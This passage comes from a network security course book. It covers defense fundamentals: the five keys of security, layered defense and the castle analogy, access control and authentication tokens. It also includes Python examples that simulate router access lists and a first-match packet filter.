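        port_match = e.dport is None or e.dport == pkt.dport
        if proto_match and port_match:
            return e.action
    return "deny (implicit)"


# The seven access-list lines exactly as the procedure has them entered.
PAGE_ACL_LINES = [
    "access-list 123 deny tcp any any eq 25",
    "access-list 123 permit ip any any",
    "access-list 145 deny tcp any any eq 25",
    "access-list 145 permit ip any any",
    "access-list 155 deny tcp any any eq 20",
    "access-list 155 deny tcp any any eq 21",
    "access-list 155 permit ip any any",
]

# Where each list is applied with 'ip access-group <N> in', per the procedure.
INBOUND_BINDINGS = {
    ("LEFT", "Serial0"): 123,
    ("RIGHT", "Serial1"): 145,
    ("CENTER", "Serial0"): 155,
    ("CENTER", "Serial1"): 155,
}


def filter_inbound(router, interface, pkt, acls=None):
    """Decide what the router does with pkt arriving inbound on interface."""
    acls = acls if acls is not None else parse_access_lists(PAGE_ACL_LINES)
    number = INBOUND_BINDINGS.get((router, interface))
    if number is None:
        return "permit (no access-group on interface)"
    return evaluate(acls[number], pkt)


if __name__ == "__main__":
    # Constructed sample traffic; addresses are placeholders.
    samples = [
        ("SMTP", Packet("tcp", "10.0.0.5", "172.18.0.10", 25)),
        ("FTP", Packet("tcp", "10.0.0.5", "172.18.0.10", 21)),
        ("HTTP", Packet("tcp", "10.0.0.5", "172.18.0.10", 80)),
        ("ping", Packet("icmp", "10.0.0.5", "172.18.0.10")),
    ]
    for router, iface in INBOUND_BINDINGS:
        for name, pkt in samples:
            print(f"{router:6} {iface:7} {name:4} -> {filter_inbound(router, iface, pkt)}")
    # Same list 155 without its permit line: even ping is dropped.
    short = parse_access_lists(PAGE_ACL_LINES)[155][:2]
    print("155 minus permit, ping ->", evaluate(short, samples[3][1]))
```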
List of Additional Files
Printed with each lesson is a list of files students open to complete the tasks in that lesson. Many tasks also require additional files that students do not open, but which are needed to support the file(s) students are working with. These supporting files are included with the student data files on the course CD-ROM or data disk. Do not delete these files.
HOW TO USE THIS BOOK
You can use this book as a learning guide, a review tool, and a reference.
As a Learning Guide
Each lesson covers one broad topic or set of related topics. Lessons are arranged in order of increasing proficiency with Tactical Perimeter Defense; skills you acquire in one lesson are used and developed in subsequent lessons. For this reason, you should work through the lessons in sequence.
We organized each lesson into explanatory topics and step-by-step activities. Topics provide the theory you need to master Tactical Perimeter Defense; activities allow you to apply this theory to practical hands-on examples.
You get to try out each new skill on a specially prepared sample file. This saves you typing time and allows you to concentrate on the technique at hand. Through the use of sample files, hands-on activities, illustrations that give you feedback at crucial steps, and supporting background information, this book provides you with the foundation and structure to learn about Tactical Perimeter Defense quickly and easily.
As a Review Tool
Any method of instruction is only as effective as the time and effort you are willing to invest in it. For this reason, we encourage you to spend some time reviewing the book's more challenging topics and activities.
As a Reference
You can use the Concepts sections in this book as a first source for definitions of terms, background information on given topics, and summaries of procedures.
Lesson 1: Network Defense Fundamentals
Overview
In this lesson, you will be introduced to the core concepts of network
security. You will examine the technologies of defending a network, and
how those technologies may be used to create a layered defense of the
network. You will also identify the foundations of network auditing.
Objectives
To define the concepts of defending a modern complex network, you will:
1A Describe the five keys of network security.
Given a network scenario, you will describe how the five keys of network security are integrated in a modern operational network.
1B Describe the concepts of defensive technologies in creating a layered
defense.
Given a network analogy of a fortified castle, you will identify the function of defensive technologies in creating a secure layered defense.
1C Describe the objectives of access control methods.
Given a network scenario, you will describe the available access control
methods and how they are implemented in the defense of the network.
1D Identify the impact of a layered defense on the performance of the network.
Given a network where a layered defensive system has been implemented, you will identify the performance impact of each layer on accessing resources in the network.
1E Define concepts of auditing in a network.
Given a network scenario, you will examine the concepts of network
auditing, including handling of data and types of audits.
Data Files
none
Lesson Time
2 hours
Topic 1A
Network Defense
In today's world, it is getting easier for attackers to infiltrate private networks. They have access to more tools and more powerful computers, and there are more networks to target. Sadly, many organizations simply do not take this threat seriously. They do not see the driving force to create a secure network. They do not see the need to spend money on a defense for their electronic assets. But the need is very real. Every year, the Computer Security Institute (CSI) and the Federal Bureau of Investigation (FBI) perform a survey of businesses, looking into the financial losses from theft of proprietary information and other losses. Although only a handful of the companies that participate in this survey have estimated their losses, the number has been in the tens to hundreds of millions of dollars.
What makes these numbers even more serious is the fact that these are voluntary reports, and only a small number of businesses are involved. Many organizations are not eager, even in an anonymous setting, to disclose any losses due to computer crime.
Even so, there is an obvious pattern here. The attacks against networks are getting more serious, with a greater loss to the business world than ever before. Even as organizations start to become more security conscious, the number of attackers grows. Clearly, defense is needed, and it is needed now.
Network systems allow authorized users of the enterprise to access information technology assets quickly through seemingly secure methods. But as remote sites are interconnected with enterprise networks through the Internet over non-dedicated lines, many unauthorized users get connected and have access as well.
Users may be naive at times about network security, because the assumption is often made that systems are needed, and are operational, to do their jobs. If they are on, some assume, they are secure. But administrators know that security is a real issue to address and that no assumptions are going to make network security magically happen. They know that carefully planned steps must be taken to build a secure network system environment, where business transactions and support functions can occur within a system built on trust. They should have complete confidence in security.
Network security must become a strategic initiative within the enterprise. It must begin as an integral part of the strategic planning process that leads to strategic action plans, resulting in budgeted tactical projects to initiate and implement network security.
The defense of the network starts with the basic security issues all networks must
address. These key issues are detailed in upcoming sections.
network: Two or more machines interconnected for communications.
threat: The means through which the ability or intent of a threat agent to adversely affect an automated system, facility, or operation can be manifest. A potential violation of security.
security: A condition that results from the establishment and maintenance of protective measures that ensure a state of inviolability from hostile acts or influences.
network security: Protection of networks and their services from unauthorized modification, destruction, or disclosure, and provision of assurance that the network performs its critical functions correctly and there are no harmful side effects. Network security includes providing for data integrity.
Five Key Issues of Network Security
The five key issues of network security are:
• Authorization and availability
• Authentication
• Confidentiality
• Integrity
• Non-repudiation
Authorization and Availability
First and foremost, network security systems must be operationally available in order to control who has access to what information technology (IT) assets, resources, files, directories, and processes within the network. The security must limit user privileges to minimize the risk of unauthorized access to sensitive information and areas of the network that only authorized users should be allowed to access. Additionally, it must make network systems available through the diligent exercise of security, but never hinder the performance of the network system in serving the authorized user.
Authorization and availability also create system assurance, which ensures that:
• Systems are available with required functionality present and correctly configured for implementation on an ongoing basis.
• There are adequate controls to protect against unauthorized user access and unintentional errors by users or software.
• There are security measures in place to deter or stop intentional exploits by attackers.
Assurance is absolutely necessary because without it, the other objectives of security will be difficult to meet. However, assurance cannot be a one-time promise but must be an ongoing effort to be most effective.
Authentication
After controlling who has access, even authorized users must be authenticated to verify and prove their identity. Authentication verifies users to be who they say they are. In data communications, authenticating the sender is necessary to verify that the data came from the right source. The receiver is authenticated as well, to verify that the data is going to the right destination. Public Key Infrastructure (PKI) is one of the best ways to ensure authentication, through digital certificates and digital signatures. The number of factors used to show the identity of the user through authentication, or to prove the identity of the user through strong authentication, determines how effective authentication can be. The three factors are:
• One-factor authentication provides what you know, such as a password or PIN. It is strictly based on recalling a piece of information from one's own memory or from writing it down (but that would defeat the purpose of providing only authorized access to networks based on using a password).
• Two-factor authentication provides what you have in addition to what you know. Examples are a proximity card for door entry or an ATM card with a PIN. An RSA SecurID token used in conjunction with a pass code, or a smart card that may carry all your security credentials in a secure way with a PIN used to access the credentials, are the second factors.
• The third factor that provides strong authentication is proving the user's identity, or who you are, by using biometrics. Biometrics uses a physiological characteristic to identify you, such as a fingerprint, retina scan, hand geometry, voice recognition, or iris scan, or a behavioral characteristic, such as keystroke recognition or signature recognition. It results in strong authentication, because users not only verify their digital identity through what they know and what they have, but they are proving their physical identity by verifying their biometric characteristics.
availability: Assuring information and communications services will be ready for use when expected.
authentication: To positively verify the identity of a user, device, or other entity in a computer system, often as a prerequisite to allowing access to resources in a system.
Confidentiality
Data communications, as well as email, need to be protected for privacy and confidentiality. Network security must provide a secure channel for the transmission of data and email that does not allow eavesdropping by unauthorized users. Data confidentiality ensures the privacy of data on the network system. PKI can provide what is required to ensure the confidentiality and privacy of communications and data transmissions across networks. The following are the four basic types of information or data that require confidentiality:
• Information that reveals technical data or source information. For example, the model number and software version of your firewall should be kept confidential, because divulging them may give a potential attacker/hacker an advantage in exploiting your system.
• Information that may be time dependent. It may only be confidential for a given amount of time and then may not have any significance as private information after that, but until then it must be kept confidential.
• Information that may reveal organizational or systems relationships that, through divulgence, may give unauthorized users a channel for social engineering exploits or other opportunities.
• Information that is private and confidential in its own right. Information that may be crucial to the operations of the enterprise and whose divulgence would surely give an attacker an easy exploitation opportunity.
confidentiality: Assuring information will be kept secret, with access limited to appropriate persons.
firewall: A system or combination of systems that enforces a boundary between two or more networks. Gateway that limits access between networks in accordance with local security policy. The typical firewall is an inexpensive micro-based Unix box kept clean of critical data, with many modems and public network ports on it, but just one carefully watched connection back to the rest of the cluster.
hacker: A person who enjoys exploring the details of computers and how to stretch their capabilities. A malicious or inquisitive meddler who tries to discover information by poking around. A person who enjoys learning the details of programming systems and how to stretch their capabilities, as opposed to most users who prefer to learn the necessary minimum.
Integrity
Integrity is a security principle that ensures the continuous accuracy of data and information stored within network systems. Continuity of data integrity is paramount. Data must be kept from unauthorized modification, forgery, or any other form of corruption, regardless of whether these come from malicious threats or from corruption that is accidental in nature. Upon receiving the email or data communication, integrity must be verified to ensure that the message has not been altered, modified, added to, or subtracted from by unauthorized users while in transit. Again, PKI will ensure the integrity of messages through digital certificates and message digests. Integrity has two main objectives:
• Data integrity ensures that the data has not been altered in an unauthorized manner while in transit, during storage, or while being processed.
• System integrity ensures that a system, while performing its intended processes and applications, provides support to authorized users free from unauthorized manipulation.
Non-repudiation
Security must be established to prevent parties in a data transaction from denying their participation after the business transaction has occurred. Through PKI, the sender as well as the receiver are authenticated with regard to their respective identities, and the transaction is given a tamperproof time stamp, to ensure non-repudiation by both parties. This establishes accountability for the transaction itself for all parties involved in the transaction. The three types of repudiation (or denial) to prevent are:
• Repudiation of origin by the message creator, who denies ever creating or writing the message itself.
• Repudiation of receipt by the receiver, who denies ever receiving the message even after receiving it.
• Repudiation of submission as to the time and date of the actual submission. The time stamp will help in non-repudiation for submission.
The Threats to Security
Threats can come from myriad sources in our connected world. The Internet is
not the only threat. An organization has to consider employees, contractors, and
even the cleaning staff! Any of these people could potentially be a threat, and
cause damage.
integrity: Assuring information will not be accidentally or maliciously altered or destroyed.
non-repudiation: Method by which the sender of data is provided with proof of delivery and the recipient is assured of the sender's identity, so that neither can later deny having processed the data.
Malicious threats are intentional in nature and can come from either internal or external users. When unauthorized users make attempts to find vulnerabilities in a network system and find them, they present themselves as a malicious threat trying to get access by whatever means available. A successful unauthorized access event is called an active threat. The malicious threat has now gained unauthorized access into your network and will exploit whatever assets can be accessed. Once accessed, the exploit can manifest itself as a passive or an active threat.
• As a passive threat, the accessed data is viewed or intercepted but not modified. It does not change the operation or the state of the system.
• If the data is intercepted and modified by an unauthorized user, it is said to be an active threat. It may also change the operation or state of the system itself.
Whether accidental or malicious, the threat can come from either internal or external users, and they may be authorized or unauthorized users. Surveys have consistently shown that of all respondents who reported a security breach within the past year, close to 60 percent of these breaches were caused by inside users accessing unauthorized resources, and over 40 percent blamed accounts left open after an employee had left the company. Of all respondents, 20 percent reported that their companies were victims of an attempted or successful break-in by an angry former employee. Also, during most economic slowdowns, companies lay off employees in increasing numbers each week. Such breaches will only get worse during these periods.
Network security administrators must:
• Realize how to minimize, or mitigate, the effects of current and future threats upon their network.
• Realize what defensive strategies and techniques must be implemented to keep networks secure. This should be done to ensure the privacy, confidentiality, and protection of sensitive data and information technology assets.
Defensive Strategies
If all threats to a network system were known, as well as all the vulnerabilities of the system itself, then a specific defensive posture could be deployed to guard and secure the system. It could even be a static defensive posture with definitive controls in place, because the exact threat would be known. Perimeter security using a firewall is a good example of a static defensive posture. The threat is assumed to be known and rules are generated to allow the firewall to work. Unfortunately, if the threat is not known, any such assumptions can be fatal to the network. Administrators must take into consideration the following points when addressing and creating a defensive posture for the enterprise network.
Defense-in-Depth
Defense-in-Depth states that all information technology assets within a protected network need to have the necessary amount of security protection to guard against direct attacks at whatever level the asset resides within the network. The assumption cannot be made that a firewall or some sort of all-encompassing perimeter security is enough to protect all information technology assets within the network.
passive threat: The threat of unauthorized disclosure of information without changing the state of the system. A type of threat that involves the interception, not the alteration, of information.
breach: The successful defeat of security controls which could result in a penetration of the system. A violation of controls of a particular information system such that information assets or system components are unduly exposed.
Active Defense-in-Depth
An Active Defense-in-Depth is necessary as a defensive posture to think creatively and counter any and every threat, whether known or unknown. It is an active defense that changes its defensive posture based on the threat. Its defensive assets are able to flex in any direction, based on the disposition of the threat. Active Defense-in-Depth is built on the concepts of Defense-in-Depth.
The requirement for securing network systems and their information technology assets against all current and future threats compels us to use multiple layers of security techniques that provide overlapping protection against attackers, hackers, and any other malicious threat that may attempt an exploit. This is a core requirement for any network taking active measures to protect its assets.
This strategy not only recognizes the value of Defense-in-Depth, which states that every information technology asset within the network must have its own necessary and adequate protection, but adds that it is an active defense that takes whatever actions are necessary to stop the threat by the utilization of multiple layers of security, including firewalls, intrusion detection, monitoring devices, and other techniques for network security. It recognizes that due to the highly interactive nature of the various systems and networks, no single system can be secured adequately unless all interconnecting systems are also secured adequately. It must take into consideration the context of a shared-risk environment that dictates protection of IT systems at all levels, because of the interactive and interconnected nature of today's systems and networks.
The strategy calls for use of multiple, overlapping protection approaches to ensure that the failure or bypass of any individual protection approach will not leave the system unprotected. Through user training and awareness, well thought-out and planned policies, procedures and processes, as well as redundancy of protection mechanisms, the Active Defense-in-Depth strategy ensures the effective protection of information technology assets so the objective and purpose of the mission can be accomplished.
An Active Defense-in-Depth utilizes the concept of addressing the largest vulnerability or the most dangerous threat first. The additional layers of security can take care of the remainder of the threats. Anything else is less of a threat, and many times the perimeter defense with firewalls can take care of many of the everyday types of threats.
There is a general flow to the Active Defense-in-Depth strategy. The first area is to advance the users' security knowledge via training. Users must realize that the upcoming changes in the network are to protect them, and if they are required to act differently while online, then they must follow the security policy and do so.
intrusion detection: Pertaining to techniques that attempt to detect intrusion into a computer or network by observation of actions, security logs, or audit data. Detection of break-ins or attempts either manually or via software expert systems that operate on logs or other information available.
vulnerability: Hardware, firmware, or software flaw that leaves an AIS open for potential exploitation. A weakness in automated system security procedures, administrative controls, physical layout, internal controls, and so forth, that could be exploited by a threat to gain unauthorized access to an AIS.
Security must then be established with a strong perimeter system. Inside the network, the Intrusion Detection System is working hard to identify unauthorized attempts to use resources. The stated strategy will respond to an attack, again as per the defined security policy. Finally, further controls and systems will be in place to minimize the likelihood of further intrusions and create a more trusted environment.
After each part of the defense strategy, the lessons that have been learned are used to strengthen the overall security of the network. Figure 1-1 illustrates this concept.
Figure 1-1: The Active Defense-in-Depth model.
Defensive Strategy Requirements
Any organization that is going to deploy a defense system to protect its network must fulfill some common requirements if the defense is going to be successful. Although these are not written as hard and fast rules, they should be followed in nearly all organizations.
attack: An attempt to bypass security controls on a computer. The attack may alter, release, or deny data. Whether an attack will succeed depends on the vulnerability of the computer system and the effectiveness of existing countermeasures.
intrusion: Any set of actions that attempts to compromise the integrity, confidentiality, or availability of a resource.
Training and Awareness
Training and awareness is the foundation for the Active Defense-in-Depth defensive posture because through training and awareness, cultural change within the enterprise occurs. A cultural change is required for all users to exercise security in their day-to-day operations and functions in execution of their processes. Military units that have a high rate of operational readiness for combat use a maxim that states, "Train like you fight, because you will fight like you train." There's a lot to be learned from such a maxim. It means that training must be realistic and replicate battle conditions. Training must replicate the same scenarios that may expose vulnerabilities for attack by the threat. The same battle scenarios are presented in training to make attack response second nature to the user, as well as to the security professional overseeing the protection of the network.
Perimeter Security
Perimeter security is the first line of defense for the network and usually is protected by a packet filtering or rules-based firewall. In order to be most effective, ensure that the firewall has the following properties and rules:
• Base your packet filtering and traffic management rules on an organizational security policy.
• The firewall defines all network connections.
• All traffic from inside out and outside in must pass through the firewall.
Intrusion Detection Systems (IDS)
Intrusion Detection Systems (IDS) are a combination of hardware and software systems that monitor and collect network system information and analyze it to detect attacks or intrusions. Some IDSs can automatically respond to an intrusion or attack based on a collected library of attack signatures. IDSs use software-based scanners, such as an Internet scanner, that may be the primary tool for network vulnerability analysis. This type of scanner performs both scheduled and deliberate probes of the network infrastructure for flaws and vulnerabilities in operating systems, routers, applications, and communication devices.
packet: A block of data sent over the network transmitting the identities of the sending and receiving stations, error-control information, and message.
packet filtering: A feature incorporated into routers and bridges to limit the flow of information based on pre-determined communications such as source, destination, or type of service being provided by the network. Packet filters let the administrator limit protocol-specific traffic to one network segment, isolate email domains, and perform many other functions.
router: An interconnection device that is similar to a bridge, but serves packets or frames containing certain protocols. Routers link LANs at the network layer.
vulnerability analysis: Systematic examination of an AIS or product to determine the adequacy of security measures, identify security deficiencies, provide data from which to predict the effectiveness of proposed security measures, and confirm the adequacy of such measures after implementation.
Attack Response
Attack response consists of many practices in response to attacks or incidents, whether real, false, or simulated for training. All attacks are handled the same way until it is verified by the administrator that an event is in fact a false positive or a simulated attack for training. In any case, the response itself needs to be kept secret from outside the security network, so as not to give any potential attackers an advantage or a possible vulnerability to exploit. A ready response team should be designated and alerted in a timely fashion once any attack has been detected. This team must have senior management backing and technical training, including security policy creation, maintenance, enforcement, and escalation during response in case the team cannot handle the particular attack.
TASK 1A-1
Identifying Non-repudiation Issues
1. What are the three potential problems a network could face if there is no assurance of non-repudiation, and what is the potential excuse for each problem?
The following examples of excuses that people are known to routinely give each other are indicative of the potential problems in a network if non-repudiation is not implemented:
• Repudiation of origin: "I never sent it."
• Repudiation of receipt: "I never received it."
• Repudiation of submission: "I sent it out a while back" versus "You say you sent it out when? I only received it yesterday."
Topic 1B
Defensive Technologies
To have a network that can be considered well-secured requires a layered defense. The concepts of a layered defense are old and simple: the more layers an attacker has to go through, the more difficult it is for the attack to be successful.
The Castle Analogy
This concept can be traced back very far; for this discussion, we will go back to the days of castles and fortresses. These buildings often housed hundreds of people and their rulers. In some cases, the castle was the entire town, with small huts outside the castle boundaries. Needless to say, they required very good and reliable security.
false positive: Occurs when the system classifies an action as anomalous (a possible intrusion) when it is a legitimate action.
10 Tactical Perimeter Defense
A castle's defense system is the classic layered concept. The castle itself is built out of strong and very thick stone. The walls of the castle are very high. The towers of the castle are even higher and allow the guards to see intruders at a greater distance. Other guards are positioned inside to watch for imposters and other internal disruptions.
Closer to the castle is the moat, a body of water surrounding the castle. The only entrance is the drawbridge, which can be raised so no one can enter or leave without permission. There is a massive door protecting the entrance past the drawbridge. Small arrow holes are hidden along the walls and in the towers for archers to use; these make it easy for arrows to get out of the castle but difficult to shoot an arrow into one of those holes.
As you can see, each additional layer of defense created a more secure overall castle. The analogy is directly transferable to networking. No single technology can create a secure network, just as a moat alone cannot create a secure castle.
Attacking the Castle
If the castles were so well defended, then how and why did they eventually fall? With layers upon layers of defense, the castles seemed as if they could not fall into their enemy's hands. History tells us otherwise.
There were three basic approaches to bringing about the downfall of a castle. One was through a massive attack, where hundreds or thousands of soldiers would storm the castle, a constant attack until the massive door finally was penetrated. This method generally would cost many lives, but often was successful.
The second approach was a variation of the first. Instead of actually storming the castle, a large army would simply lay siege to the castle for months until finally the defenders would give up.
The third method was to find the secret entrance(s). Often the castle needed secret alternate ways in and out for emergencies. Once the enemy found this second entrance, they could send a small force in to open the castle from inside. This would prove to be a more effective method, since the cost in lives to the attacker was far less.
Now, looking at this analogy, what are the defensive technologies employed in today's network security terms? There are many similarities, as you may have noticed.
The Castle's Firewall
In the castle analogy, there is a definite firewall in place. The two parts would be the moat and the high stone walls. This is how the firewall should operate in a network: in multiple parts. For example, you may have a firewall blocking ports, and another part of the firewall that is running Network Address Translation (NAT) to hide your internal IP addresses. These pieces are the classic perimeter security system, and all networks that are serious about security must have them.
Further analogies to the firewall are the arrow holes and the front door itself. These arrow holes are roughly equivalent to protocol port numbers, in that they are small and can be set up to be only one-way. Arrows go out, but they do not come back in. The front door can be opened to allow full two-way movement or communication.
The Castle's Intrusion Detection
The guards on the inside watching for an imposter or other internal problem are the intrusion detection. The guards high up in the watchtower are also part of the Intrusion Detection System, looking for attackers from the outside.
The Castle's Back Doors
One of the most serious problems with the security of a network is a back door. If a user installs a modem and makes an independent, direct connection to the Internet, all an attacker needs to do is find that back door. Once the back door is found, the attacker can come in and open up the entire network from the inside.
This analogy is used to illustrate the need for a solid, well-planned, layered defense strategy for the network. Since any single point is subject to attack and potential failure, there must be other systems in place that work as defense for the network. Figure 1-2 is a graphical representation of the layered concept.
Figure 1-2: The layered defense concept.
protocol: Agreed-upon methods of communications used by computers. A specification that describes the rules and procedures that products should follow to perform activities on a network, such as transmitting data. If they use the same protocols, products from different vendors should be able to communicate on the same network.
back door: A hole in the security of a computer system deliberately left in place by designers or maintainers. Synonymous with trap door; a hidden software or hardware mechanism used to circumvent security controls.
The Defense Technologies
So, what exactly are the defensive technologies that can be deployed in a network? There are many, and some are not purely defensive, but they are used in the defense of the network.
Figure 1-3: The layers of defense in reaching a file.
The best way of looking at the defense of the network is to start on the outside, at the perimeter, and work your way in to the target. The target may be a number of different things, but we will focus in this discussion on an application residing on a host computer.
1. The first aspect in the defense of the network does not even use electricity. It is the security policy. Many people consider the firewall the first line of defense, but this could be argued as incorrect. Without a policy, the firewall cannot be configured! So, the first item is the policy. There must be a clear understanding of the purpose of the security in the network. The policy must cover who can do what, when, and how. The policy also must state the clear objectives of each piece of equipment used in the defense of the network. As with many things in life, proper planning is required for successful implementation.
2. After the security policy has been created and agreed to, the implementation of the defense systems can begin. On the very edge of the network are the routers. These routers may be configured, via access control lists, to perform part of the firewall system, and provide some level of packet filtering. The firewall may provide NAT and proxy services. NAT will ensure that the internal private addresses stay hidden, and the proxy services will make requests for resources on behalf of the internal clients.
3. Moving through the layers, beyond the firewall, the next piece is the IDS. The IDS is in place to notify the security professionals when an intrusion has happened, and can perform this function both on the inside of the network, and also detect attempts on the outside of the network.
4. Still deeper into the defense of the network is authentication. The host computer will require a form of authentication to gain access to the resources. Making it to the host is one thing, authenticating with the host and getting access is another.
5. After authentication with the host is the file system security. Each file, or each resource, should be designed with its own security. This security dictates who has access to this file, and what kind of access each person has. The file security may even specify the times during the day that users have access to the file.
The physical security of the network, although not a specific technology, is worth mentioning. Physical security of the computers, routers, switches, and employees is critical to maintaining a well-defended network. There is no point in implementing all the above technologies if anyone can walk into an office and browse a computer. Physical access must be part of the defense, and should be outlined in the security policy.
host: A single computer or workstation; it can be connected to a network.
proxy: A firewall mechanism that replaces the IP address of a host on the internal (protected) network with its own IP address for all traffic passing through it. A software agent that acts on behalf of a user; typical proxies accept a connection from a user, make a decision as to whether or not the user or client IP address is permitted to use the proxy, perhaps do additional authentication, and then complete a connection on behalf of the user to a remote destination.
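To make the perimeter layer concrete, the following is an added example (not code from the course) of a first-match packet filter of the kind a router access control list or firewall provides, including the one-way behaviour of the arrow-hole analogy: connections may go out, and only replies to them come back in. All addresses, ports and rules are constructed for illustration, and the small flow table is a simplification of what real firewalls do with connection state.

```python
"""
Added example, not part of the course text: a minimal first-match packet filter
modelling the router/firewall layer. All addresses, ports and rules below are
constructed for illustration.
"""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Dict, List, Optional, Set, Tuple


@dataclass(frozen=True)
class Packet:
    direction: str          # "in" = arriving from the Internet, "out" = leaving the LAN
    proto: str              # "tcp" or "udp"
    src: str
    sport: int
    dst: str
    dport: int


@dataclass(frozen=True)
class Rule:
    direction: str
    proto: Optional[str]    # None matches any protocol
    src: str                # CIDR network
    dst: str                # CIDR network
    dport: Optional[int]    # None matches any destination port
    action: str             # "allow" or "deny"

    def matches(self, p: Packet) -> bool:
        return (self.direction == p.direction
                and self.proto in (None, p.proto)
                and ip_address(p.src) in ip_network(self.src)
                and ip_address(p.dst) in ip_network(self.dst)
                and self.dport in (None, p.dport))


class PacketFilter:
    """First-match rule evaluation with an implicit final deny."""

    def __init__(self, rules: List[Rule]):
        self.rules = list(rules)
        # Outbound flows already permitted: (proto, src, sport, dst, dport).
        # Replies to these are let back in; this is the "arrows out, not in" hole.
        self.flows: Set[Tuple[str, str, int, str, int]] = set()

    def decide(self, p: Packet) -> str:
        if p.direction == "in" and (p.proto, p.dst, p.dport, p.src, p.sport) in self.flows:
            return "allow"                      # reply to a connection the LAN opened
        for r in self.rules:
            if r.matches(p):
                if r.action == "allow" and p.direction == "out":
                    self.flows.add((p.proto, p.src, p.sport, p.dst, p.dport))
                return r.action
        return "deny"                           # nothing in policy covers it


LAN = "10.0.0.0/8"          # constructed internal address space
ANY = "0.0.0.0/0"
MAIL = "10.0.5.10/32"       # constructed mail server that must accept SMTP

# Rules derived from a (constructed) policy: the LAN may browse and resolve names,
# the Internet may only reach the mail server on port 25, everything else is denied.
POLICY = [
    Rule("out", "tcp", LAN, ANY, 80, "allow"),
    Rule("out", "tcp", LAN, ANY, 443, "allow"),
    Rule("out", "udp", LAN, ANY, 53, "allow"),
    Rule("in", "tcp", ANY, MAIL, 25, "allow"),
]

# The same policy with one misordered rule: a broad deny placed first shadows
# the SMTP allow, and inbound mail silently stops (the misconfiguration case
# the lesson warns about).
MISORDERED = [Rule("in", None, ANY, LAN, None, "deny")] + POLICY


def run_demo(rules: List[Rule] = POLICY) -> Dict[str, str]:
    """Push a constructed traffic sample through the filter and return decisions."""
    fw = PacketFilter(rules)
    sample = {
        "lan_http_out": Packet("out", "tcp", "10.0.1.5", 40000, "203.0.113.7", 80),
        "http_reply_in": Packet("in", "tcp", "203.0.113.7", 80, "10.0.1.5", 40000),
        "unsolicited_ssh_in": Packet("in", "tcp", "198.51.100.9", 51000, "10.0.1.5", 22),
        "smtp_to_mail_in": Packet("in", "tcp", "198.51.100.9", 52000, "10.0.5.10", 25),
        "smtp_to_workstation_in": Packet("in", "tcp", "198.51.100.9", 52001, "10.0.1.5", 25),
        "lan_telnet_out": Packet("out", "tcp", "10.0.1.5", 40001, "203.0.113.7", 23),
    }
    # Order matters: the reply is evaluated after the request that opened the flow.
    return {name: fw.decide(pkt) for name, pkt in sample.items()}


if __name__ == "__main__":
    for name, verdict in run_demo().items():
        print(f"{name:24s} {verdict}")
    print("inbound SMTP with misordered rules:", run_demo(MISORDERED)["smtp_to_mail_in"])
```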
TASK 1B-1
Describing the Layers of a Defended Network
1. Describe how an organization benefits from implementing each layer of a layered defense to protect their network.
Benefits to implementing a layered defense include:
Security Policy: Organized defense.
Perimeter Defense: Rule sets define what kind of traffic is allowed in or out.
IDS: Monitoring of network or hosts to detect unusual behavior or attacks so that responses can be calculated, rather than remain arbitrary.
Authentication: Depending upon the level of authentication used (one-, two-, or three-factor), it can be very difficult for one user to impersonate another.
File System Security: Users with verified credentials are granted or denied access to certain resources.
Physical Security: Prevents access to machines by users with malicious intent.
NAT and proxy services are covered in greater detail in upcoming lessons.
physical security: The measures used to provide physical protection of resources against deliberate and accidental threats.
Topic 1C
Objectives of Access Control
Every network, no matter how well it is defended, will require verification of the network users' credentials. This is the process of access control. All networks need a system in place to be sure only authorized users have access to the network and its resources.
Access Control
On the network, one of the critical areas of security is determining who has access to what. It is the security professional's job to ensure that the policy guidelines are met and no unauthorized access of resources takes place. Or, as the definition of access control states, it is the prevention of unauthorized use by controlling the access to any protected system or resource.
Access control systems are what help the security professional satisfy that requirement. There are two types of access control that may be implemented: Mandatory Access Control (MAC) and Discretionary Access Control (DAC). The policy in place determines which of these controls will be used.
Mandatory Access Control
MAC is an access control policy that supports a system which generally handles highly sensitive or secret information. Government agencies typically use MAC. Also, the security classification of both the user, called a subject, and the data or resource being accessed, called an object, must be labeled as Top Secret, Secret, or Classified for security. These labels are security classifications for objects and security clearances for subjects. If only one level of security is maintained in a system, it is called a System High Policy, which requires all system users to have the appropriate clearance for the highest level of sensitive information that may be accessed. If Secret information is on this system, then all authorized users must have at least a Secret clearance level. If multiple levels of classified information are on a single system and require users with different security clearances to access it, then a Multi-level Security Policy is enforced. To make this effective, the system typically has screened subnets, by use of firewalls, to allow access only to appropriate clearance-level users.
Discretionary Access Control
DAC is an access control policy that uses the identity of the user, or of the group to which they belong, to allow authorized access. It is discretionary in that the administrator is able to control who has access, to what, and what type of access they will have, such as create or write, read, update, or delete. This is known as CRUD, which stands for Create, Read, Update, and Delete.
Authentication
Once the policies of access control are in place, there needs to be a mechanism that can verify the user who is requesting access. Having either DAC or MAC in the organization's network is useless if the network cannot identify the users of the network. This is where authentication comes in. Although each operating system has its own methods of authentication, here we will discuss the concepts and methods of authentication.
How is authentication defined? The basic definition is the process of determining the identity of a user that is attempting to access a system. (The word "system" in this case could be a router, server, workstation, and so on.)
Authentication occurs when a user provides the requested information to an authentication verification authority. The requested information can take many forms, as you will see. The verification authority can also take different forms, but is generally a server on the network.
The traditional method of authentication is to provide a password. This password is a value that the user creates individually, or is generated for them. In any case, it is a value the user remembers and enters when requested. Systems can be as simple as having a single password to log in and use every resource available, or as complex as requiring one password to log in and different passwords to access specific resources.
To increase the level of reliability and ease of use to users, biometric authentication can be introduced. When this type of system is added to the authentication scheme, it is considered to be strong authentication. The designation of strong is given since the user is not only identified digitally, but by their physical person via a physiological characteristic, such as a fingerprint scan, iris scan, or hand geometry.
Authentication Tokens
For some organizations, the traditional methods of using passwords are not enough, and the implementation of a biometric solution, such as fingerprint scanning, does not meet their policy requirements. These organizations may then look to tokens. Tokens come in different sizes and implementations.
An authentication token is a portable device used for authenticating a user, thereby allowing authorized access into a network system. The tokens are literal physical devices and they operate by using systems such as challenge and response or time-based code sequences. One of the most well-known is the RSA SecurID token.
Challenge Response Token
The challenge response token is an authentication technique using a calculator-type token that contains identical security keys or algorithms as a Network Access Server (NAS). The NAS sends an unpredictable challenge to the user, who computes a response using their authentication response token. This is shown in Figure 1-4.
server: A system that provides network service such as disk storage and file transfer, or a program that provides such a service. A kind of daemon that performs a service for the requester, which often runs on a computer other than the client machine.
Figure 1-4: An example of a challenge response card from Cryptocard.
The Challenge Response Process
Each challenge response token is pre-loaded with a Data Encryption Standard (DES) encryption key and a default user PIN unique to that token in association with a User Name. Neither of these items can be extracted from the token.
